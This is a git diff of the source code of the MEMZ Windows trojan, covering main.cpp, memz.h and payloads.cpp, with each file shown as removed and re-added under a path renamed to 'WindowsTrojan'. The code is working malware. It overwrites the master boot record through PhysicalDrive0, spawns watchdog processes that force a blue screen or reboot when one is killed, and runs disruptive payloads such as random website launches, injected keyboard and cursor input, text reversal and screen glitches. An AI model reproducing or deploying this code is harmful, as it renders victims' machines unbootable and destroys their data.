SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); - MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND); - UnhookWindowsHookEx(hook); - - return 0; -} -#else // CLEAN -LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { - PAINTSTRUCT ps; - HDC hdc; - - if (msg == WM_ACTIVATE) { - if (wParam == NULL) - dialog = NULL; - else - dialog = hwnd; - } else if (msg == WM_DESTROY) { - ExitProcess(0); - } else if (msg == WM_COMMAND) { - if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) { - for (int p = 0; p < nPayloads; p++) { - if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) { - SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL); - // Most ugly formatting EVER - if (MessageBoxA(hwnd, - "This payload is considered 
semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\ -If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \ -virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\ -Do you still want to enable it?", -"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) { - SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL); - } - } - } - } - } else if (msg == WM_PAINT) { - hdc = BeginPaint(hwnd, &ps); - SelectObject(hdc, font); - LPWSTR str; - LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED"; - FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY, - L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state); - - TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str)); - TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65); - - EndPaint(hwnd, &ps); - } else { - return DefWindowProc(hwnd, msg, wParam, lParam); - } - - return 0; -} - -DWORD WINAPI keyboardThread(LPVOID lParam) { - for (;;) { - if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { - enablePayloads = !enablePayloads; - - if (!enablePayloads) { - RECT rect; - HWND desktop = GetDesktopWindow(); - GetWindowRect(desktop, &rect); - - RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN); - - EnumWindows(&CleanWindowsProc, NULL); - } else { - RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE); - } - - while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { - Sleep(100); - } - } else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) { - if (enablePayloads) { - for (int p = 0; p < nPayloads; p++) { - if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { - 
payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE); - } - } - } - } - - Sleep(10); - } - - return 0; -} - -BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) { - DWORD pid; - if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) { - SendMessage(hwnd, WM_CLOSE, 0, 0); - } - return TRUE; -} -#endif - - +#include "memz.h" + +#ifdef CLEAN +HWND mainWindow; // In the main window, in the main window, in the main window, ... +HFONT font; +HWND dialog; +#endif + +void main() { +#ifndef CLEAN + int argc; + LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc); + + if (argc > 1) { + if (!lstrcmpW(argv[1], L"/watchdog")) { + CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL); + + WNDCLASSEXA c; + c.cbSize = sizeof(WNDCLASSEXA); + c.lpfnWndProc = WindowProc; + c.lpszClassName = "hax"; + c.style = 0; + c.cbClsExtra = 0; + c.cbWndExtra = 0; + c.hInstance = NULL; + c.hIcon = 0; + c.hCursor = 0; + c.hbrBackground = 0; + c.lpszMenuName = NULL; + c.hIconSm = 0; + + RegisterClassExA(&c); + + HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL); + + MSG msg; + while (GetMessage(&msg, NULL, 0, 0) > 0) { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + } + } else { + // Another very ugly formatting + if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\ +This malware will harm your computer and makes it unusable.\r\n\ +If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\ +If you know what this malware does and are using a safe environment to test, \ +press Yes to start it.\r\n\r\n\ +DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES || +MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\ +THE CREATOR IS NOT RESPONSIBLE FOR ANY 
DAMAGE MADE USING THIS MALWARE!\r\n\ +STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) { + ExitProcess(0); + } + + wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2); + GetModuleFileName(NULL, fn, 8192); + + for (int i = 0; i < 5; i++) + ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT); + + SHELLEXECUTEINFO info; + info.cbSize = sizeof(SHELLEXECUTEINFO); + info.lpFile = fn; + info.lpParameters = L"/main"; + info.fMask = SEE_MASK_NOCLOSEPROCESS; + info.hwnd = NULL; + info.lpVerb = NULL; + info.lpDirectory = NULL; + info.hInstApp = NULL; + info.nShow = SW_SHOWDEFAULT; + + ShellExecuteEx(&info); + + SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS); + + ExitProcess(0); + } + + HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); + + if (drive == INVALID_HANDLE_VALUE) + ExitProcess(2); + + unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536); + + // Join the two code parts together + int i = 0; + for (; i < code1_len; i++) + *(bootcode + i) = *(code1 + i); + for (i = 0; i < code2_len; i++) + *(bootcode + i + 0x1fe) = *(code2 + i); + + DWORD wb; + if (!WriteFile(drive, bootcode, 65536, &wb, NULL)) + ExitProcess(3); + + CloseHandle(drive); + + HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); + + if (note == INVALID_HANDLE_VALUE) + ExitProcess(4); + + if (!WriteFile(note, msg, msg_len, &wb, NULL)) + ExitProcess(5); + + CloseHandle(note); + ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT); + + for (int p = 0; p < nPayloads; p++) { + Sleep(payloads[p].startDelay); + CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); + } + + for (;;) { + Sleep(10000); + } + +#else // CLEAN + InitCommonControls(); + + dialog = NULL; + + LOGFONT lf; + 
GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf); + font = CreateFont(lf.lfHeight, lf.lfWidth, + lf.lfEscapement, lf.lfOrientation, lf.lfWeight, + lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet, + lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality, + lf.lfPitchAndFamily, lf.lfFaceName); + + WNDCLASSEX c; + c.cbSize = sizeof(WNDCLASSEX); + c.lpfnWndProc = WindowProc; + c.lpszClassName = L"MEMZPanel"; + c.style = CS_HREDRAW | CS_VREDRAW; + c.cbClsExtra = 0; + c.cbWndExtra = 0; + c.hInstance = NULL; + c.hIcon = 0; + c.hCursor = 0; + c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1); + c.lpszMenuName = NULL; + c.hIconSm = 0; + + RegisterClassEx(&c); + + RECT rect; + rect.left = 0; + rect.right = WINDOWWIDTH; + rect.top = 0; + rect.bottom = WINDOWHEIGHT; + + AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE); + + mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, + 50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL); + + for (int p = 0; p < nPayloads; p++) { + payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY, + (p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT, + mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL); + SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE); + + CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL); + //CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL); + } + + SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE); + + ShowWindow(mainWindow, SW_SHOW); + UpdateWindow(mainWindow); + + CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL); + + MSG msg; + while (GetMessage(&msg, NULL, 0, 0) > 0) { + if (dialog == 
NULL || !IsDialogMessage(dialog, &msg)) { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + } +#endif +} + +#ifndef CLEAN +LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { + if (msg == WM_CLOSE || msg == WM_ENDSESSION) { + killWindows(); + return 0; + } + + return DefWindowProc(hwnd, msg, wParam, lParam); +} + +DWORD WINAPI watchdogThread(LPVOID parameter) { + int oproc = 0; + + char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512); + GetProcessImageFileNameA(GetCurrentProcess(), fn, 512); + + Sleep(1000); + + for (;;) { + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + PROCESSENTRY32 proc; + proc.dwSize = sizeof(proc); + + Process32First(snapshot, &proc); + + int nproc = 0; + do { + HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID); + char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512); + GetProcessImageFileNameA(hProc, fn2, 512); + + if (!lstrcmpA(fn, fn2)) { + nproc++; + } + + CloseHandle(hProc); + LocalFree(fn2); + } while (Process32Next(snapshot, &proc)); + + CloseHandle(snapshot); + + if (nproc < oproc) { + killWindows(); + } + + oproc = nproc; + + Sleep(10); + } +} + +void killWindows() { + // Show cool MessageBoxes + for (int i = 0; i < 20; i++) { + CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL); + Sleep(100); + } + + killWindowsInstant(); +} + +void killWindowsInstant() { + // Try to force BSOD first + // I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)... + // This isn't even an exploit, it's just an undocumented feature. 
+ HMODULE ntdll = LoadLibraryA("ntdll"); + FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege"); + FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError"); + + if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) { + BOOLEAN tmp1; DWORD tmp2; + ((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1); + ((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2); + } + + // If the computer is still running, do it the normal way + HANDLE token; + TOKEN_PRIVILEGES privileges; + + OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token); + + LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid); + privileges.PrivilegeCount = 1; + privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + + AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0); + + // The actual restart + ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK); +} + +DWORD WINAPI ripMessageThread(LPVOID parameter) { + HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); + MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND); + UnhookWindowsHookEx(hook); + + return 0; +} +#else // CLEAN +LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { + PAINTSTRUCT ps; + HDC hdc; + + if (msg == WM_ACTIVATE) { + if (wParam == NULL) + dialog = NULL; + else + dialog = hwnd; + } else if (msg == WM_DESTROY) { + ExitProcess(0); + } else if (msg == WM_COMMAND) { + if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) { + for (int p = 0; p < nPayloads; p++) { + if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) { + SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL); + // Most ugly formatting EVER + if (MessageBoxA(hwnd, + "This payload is considered 
semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\ +If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \ +virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\ +Do you still want to enable it?", +"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) { + SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL); + } + } + } + } + } else if (msg == WM_PAINT) { + hdc = BeginPaint(hwnd, &ps); + SelectObject(hdc, font); + LPWSTR str; + LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED"; + FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY, + L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state); + + TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str)); + TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65); + + EndPaint(hwnd, &ps); + } else { + return DefWindowProc(hwnd, msg, wParam, lParam); + } + + return 0; +} + +DWORD WINAPI keyboardThread(LPVOID lParam) { + for (;;) { + if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { + enablePayloads = !enablePayloads; + + if (!enablePayloads) { + RECT rect; + HWND desktop = GetDesktopWindow(); + GetWindowRect(desktop, &rect); + + RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN); + + EnumWindows(&CleanWindowsProc, NULL); + } else { + RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE); + } + + while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { + Sleep(100); + } + } else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) { + if (enablePayloads) { + for (int p = 0; p < nPayloads; p++) { + if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { + 
payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE); + } + } + } + } + + Sleep(10); + } + + return 0; +} + +BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) { + DWORD pid; + if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) { + SendMessage(hwnd, WM_CLOSE, 0, 0); + } + return TRUE; +} +#endif + + diff --git a/VCProject/MEMZ/memz.h b/WindowsTrojan/MEMZ/memz.h similarity index 96% rename from VCProject/MEMZ/memz.h rename to WindowsTrojan/MEMZ/memz.h index bf730ad..8a835f7 100644 --- a/VCProject/MEMZ/memz.h +++ b/WindowsTrojan/MEMZ/memz.h 
@@ -1,65 +1,65 @@ -// If this is defined, the trojan will disable all destructive payloads -// and does display a GUI to manually control all of the non-destructive ones. -//#define CLEAN - -#ifdef CLEAN -// Enable XP styles -#pragma comment(linker,"\"/manifestdependency:type='win32' \ -name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \ -processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"") - -// Window attributes -#define BTNWIDTH 200 -#define BTNHEIGHT 30 -#define COLUMNS 3 -#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS) -#define SPACE 10 -#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE -#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32 -#endif - -#pragma once - -#include -#include -#include -#include -#include - -#include "data.h" -#include "payloads.h" - -int random(); -void strReverseW(LPWSTR str); - -PAYLOADHOST(payloadHostDefault); -PAYLOADHOST(payloadHostVisual); - -LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam); - -#ifndef CLEAN -void killWindows(); -void killWindowsInstant(); - -DWORD WINAPI ripMessageThread(LPVOID); -DWORD WINAPI watchdogThread(LPVOID); -#else -DWORD WINAPI keyboardThread(LPVOID lParam); -extern BOOLEAN enablePayloads; -BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam); -#endif - -PAYLOADFUNCTIONDEFAULT(payloadExecute); -PAYLOADFUNCTIONDEFAULT(payloadCursor); -PAYLOADFUNCTIONVISUAL(payloadInvert); -PAYLOADFUNCTIONDEFAULT(payloadMessageBox); -DWORD WINAPI messageBoxThread(LPVOID); -LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM); -PAYLOADFUNCTIONDEFAULT(payloadReverseText); -BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam); -PAYLOADFUNCTIONDEFAULT(payloadSound); -PAYLOADFUNCTIONVISUAL(payloadGlitches); -PAYLOADFUNCTIONDEFAULT(payloadKeyboard); -PAYLOADFUNCTIONVISUAL(payloadTunnel); -PAYLOADFUNCTIONVISUAL(payloadDrawErrors); +// If this is defined, the trojan will disable all destructive payloads +// and does display a GUI to 
manually control all of the non-destructive ones. +//#define CLEAN + +#ifdef CLEAN +// Enable XP styles +#pragma comment(linker,"\"/manifestdependency:type='win32' \ +name='Microsoft.Windows.Common-Controls' version='6.0.0.0' \ +processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"") + +// Window attributes +#define BTNWIDTH 200 +#define BTNHEIGHT 30 +#define COLUMNS 3 +#define ROWS ((nPayloads + nPayloads%COLUMNS)/COLUMNS) +#define SPACE 10 +#define WINDOWWIDTH COLUMNS * BTNWIDTH + (COLUMNS + 1)*SPACE +#define WINDOWHEIGHT ROWS * BTNHEIGHT + (ROWS + 1)*SPACE + 32 +#endif + +#pragma once + +#include +#include +#include +#include +#include + +#include "data.h" +#include "payloads.h" + +int random(); +void strReverseW(LPWSTR str); + +PAYLOADHOST(payloadHostDefault); +PAYLOADHOST(payloadHostVisual); + +LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam); + +#ifndef CLEAN +void killWindows(); +void killWindowsInstant(); + +DWORD WINAPI ripMessageThread(LPVOID); +DWORD WINAPI watchdogThread(LPVOID); +#else +DWORD WINAPI keyboardThread(LPVOID lParam); +extern BOOLEAN enablePayloads; +BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam); +#endif + +PAYLOADFUNCTIONDEFAULT(payloadExecute); +PAYLOADFUNCTIONDEFAULT(payloadCursor); +PAYLOADFUNCTIONVISUAL(payloadInvert); +PAYLOADFUNCTIONDEFAULT(payloadMessageBox); +DWORD WINAPI messageBoxThread(LPVOID); +LRESULT CALLBACK msgBoxHook(int, WPARAM, LPARAM); +PAYLOADFUNCTIONDEFAULT(payloadReverseText); +BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam); +PAYLOADFUNCTIONDEFAULT(payloadSound); +PAYLOADFUNCTIONVISUAL(payloadGlitches); +PAYLOADFUNCTIONDEFAULT(payloadKeyboard); +PAYLOADFUNCTIONVISUAL(payloadTunnel); +PAYLOADFUNCTIONVISUAL(payloadDrawErrors); PAYLOADHOST(payloadHostCrazyBus); \ No newline at end of file 
diff --git a/VCProject/MEMZ/payloads.cpp b/WindowsTrojan/MEMZ/payloads.cpp similarity index 96% rename from VCProject/MEMZ/payloads.cpp rename to WindowsTrojan/MEMZ/payloads.cpp index fd3ae9f..f1d8368 100644 --- a/VCProject/MEMZ/payloads.cpp +++ b/WindowsTrojan/MEMZ/payloads.cpp 
@@ -1,300 +1,300 @@ -#include "memz.h" - -PAYLOAD payloads[] = { -#ifdef CLEAN - { payloadHostDefault, (LPVOID)payloadExecute, L"Open random websites/programs", FALSE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadCursor, L"Random cursor movement", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadKeyboard, L"Random keyboard input", FALSE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadSound, L"Random error sounds", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadInvert, L"Invert Screen", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadMessageBox, L"Message boxes", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadDrawErrors, L"Draw error icons", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadReverseText, L"Reverse text", FALSE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadTunnel, L"Tunnel effect", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadGlitches, L"Screen glitches", TRUE, 0, 0, 0, 0, 0 }, - { payloadHostCrazyBus, NULL, L"Crazy Bus (Ear Rape)", TRUE, 0, 0, 0, 0, 0 }, -#else - { payloadHostDefault, (LPVOID)payloadExecute, 30000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadCursor, 30000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadKeyboard, 20000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadSound, 50000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadInvert, 30000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadMessageBox, 20000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadDrawErrors, 10000, 0, 0, 0, 0 }, - { payloadHostDefault, (LPVOID)payloadReverseText, 40000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadTunnel, 60000, 0, 0, 0, 0 }, - { payloadHostVisual, (LPVOID)payloadGlitches, 15000, 0, 0, 0, 0 }, - { payloadHostCrazyBus, NULL, 1000, 0, 0, 0, 0 }, -#endif -}; - -const size_t nPayloads = sizeof(payloads) / sizeof(PAYLOAD); -BOOLEAN enablePayloads = TRUE; - -PAYLOADHOST(payloadHostDefault) { - 
PAYLOAD *payload = (PAYLOAD*)parameter; - - for (;;) { -#ifdef CLEAN - if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { -#endif - if (payload->delaytime++ >= payload->delay) { -#ifdef CLEAN - payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE); -#else - payload->delay = ((PAYLOADFUNCTIONDEFAULT((*)))payload->payloadFunction)(payload->times++, payload->runtime); -#endif - - payload->delaytime = 0; - } - - payload->runtime++; -#ifdef CLEAN - } else { - payload->runtime = 0; - payload->times = 0; - payload->delay = 0; - } -#endif - - Sleep(10); - } -} - -PAYLOADHOST(payloadHostVisual) { - PAYLOAD *payload = (PAYLOAD*)parameter; - - HWND hwnd = GetDesktopWindow(); - HDC hdc = GetWindowDC(hwnd); - RECT rekt; - GetWindowRect(hwnd, &rekt); - int w = rekt.right - rekt.left; - int h = rekt.bottom - rekt.top; - - for (;;) { -#ifdef CLEAN - if (enablePayloads && SendMessage(payload->btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { -#endif - if (payload->delaytime++ >= payload->delay) { -#ifdef CLEAN - payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, FALSE, hwnd, hdc, &rekt, w, h); -#else - payload->delay = ((PAYLOADFUNCTIONVISUAL((*)))payload->payloadFunction)(payload->times++, payload->runtime, hwnd, hdc, &rekt, w, h); -#endif - payload->delaytime = 0; - } - - payload->runtime++; -#ifdef CLEAN - } - else { - payload->runtime = 0; - payload->times = 0; - payload->delay = 0; - } -#endif - - Sleep(10); - } -} - -PAYLOADFUNCTIONDEFAULT(payloadExecute) { - PAYLOADHEAD - - ShellExecuteA(NULL, "open", (LPCSTR)sites[random() % nSites], NULL, NULL, SW_SHOWDEFAULT); - - out: return 1500.0 / (times / 15.0 + 1) + 100 + (random() % 200); -} - -PAYLOADFUNCTIONVISUAL(payloadInvert) { - PAYLOADHEAD - - BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, NOTSRCCOPY); - - out: return 100; -} - -PAYLOADFUNCTIONDEFAULT(payloadCursor) { - PAYLOADHEAD - - 
POINT cursor; - GetCursorPos(&cursor); - - SetCursorPos(cursor.x + (random() % 3 - 1) * (random() % (runtime / 2200 + 2)), cursor.y + (random() % 3 - 1) * (random() % (runtime / 2200 + 2))); - - out: return 2; -} - -PAYLOADFUNCTIONDEFAULT(payloadMessageBox) { - PAYLOADHEAD - - CreateThread(NULL, 4096, &messageBoxThread, NULL, NULL, NULL); - - out: return 2000.0 / (times / 8.0 + 1) + 20 + (random() % 30); -} - -DWORD WINAPI messageBoxThread(LPVOID parameter) { - HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId()); - MessageBoxW(NULL, L"Still using this computer?", L"lol", MB_SYSTEMMODAL | MB_OK | MB_ICONWARNING); - UnhookWindowsHookEx(hook); - - return 0; -} - -LRESULT CALLBACK msgBoxHook(int nCode, WPARAM wParam, LPARAM lParam) { - if (nCode == HCBT_CREATEWND) { - CREATESTRUCT *pcs = ((CBT_CREATEWND *)lParam)->lpcs; - - if ((pcs->style & WS_DLGFRAME) || (pcs->style & WS_POPUP)) { - HWND hwnd = (HWND)wParam; - - int x = random() % (GetSystemMetrics(SM_CXSCREEN) - pcs->cx); - int y = random() % (GetSystemMetrics(SM_CYSCREEN) - pcs->cy); - - pcs->x = x; - pcs->y = y; - } - } - - return CallNextHookEx(0, nCode, wParam, lParam); -} - -PAYLOADFUNCTIONDEFAULT(payloadReverseText) { - PAYLOADHEAD - - EnumChildWindows(GetDesktopWindow(), &EnumChildProc, NULL); - - out: return 50; -} - -BOOL CALLBACK EnumChildProc(HWND hwnd, LPARAM lParam) { - LPWSTR str = (LPWSTR)GlobalAlloc(GMEM_ZEROINIT, sizeof(WCHAR) * 8192); - - if (SendMessageTimeoutW(hwnd, WM_GETTEXT, 8192, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL)) { - strReverseW(str); - SendMessageTimeoutW(hwnd, WM_SETTEXT, NULL, (LPARAM)str, SMTO_ABORTIFHUNG, 100, NULL); - } - - GlobalFree(str); - - return TRUE; -} - -PAYLOADFUNCTIONDEFAULT(payloadSound) { - PAYLOADHEAD - - // There seems to be a bug where toggling ALL payloads kills the sound output on some systems. - // I don't know why this happens, but using SND_SYNC seems to fix the bug. - // But the sound is not not as fast as before. 
I hope there is another way to fix it without slowing down the payload. - // As this only happens for the enable-disable part, I will only include that in the clean build as a workaround. -#ifdef CLEAN - PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_SYNC); - out: return random() % 10; -#else - PlaySoundA(sounds[random() % nSounds], GetModuleHandle(NULL), SND_ASYNC); - out: return 20 + (random() % 20); -#endif -} - -PAYLOADFUNCTIONVISUAL(payloadGlitches) { - PAYLOADHEAD - - int x1 = random() % (w - 400); - int y1 = random() % (h - 400); - int x2 = random() % (w - 400); - int y2 = random() % (h - 400); - int width = random() % 400; - int height = random() % 400; - - BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY); - - out: return 200.0 / (times / 5.0 + 1) + 3; -} - -PAYLOADFUNCTIONDEFAULT(payloadKeyboard) { - PAYLOADHEAD - - INPUT input; - - input.type = INPUT_KEYBOARD; - input.ki.wVk 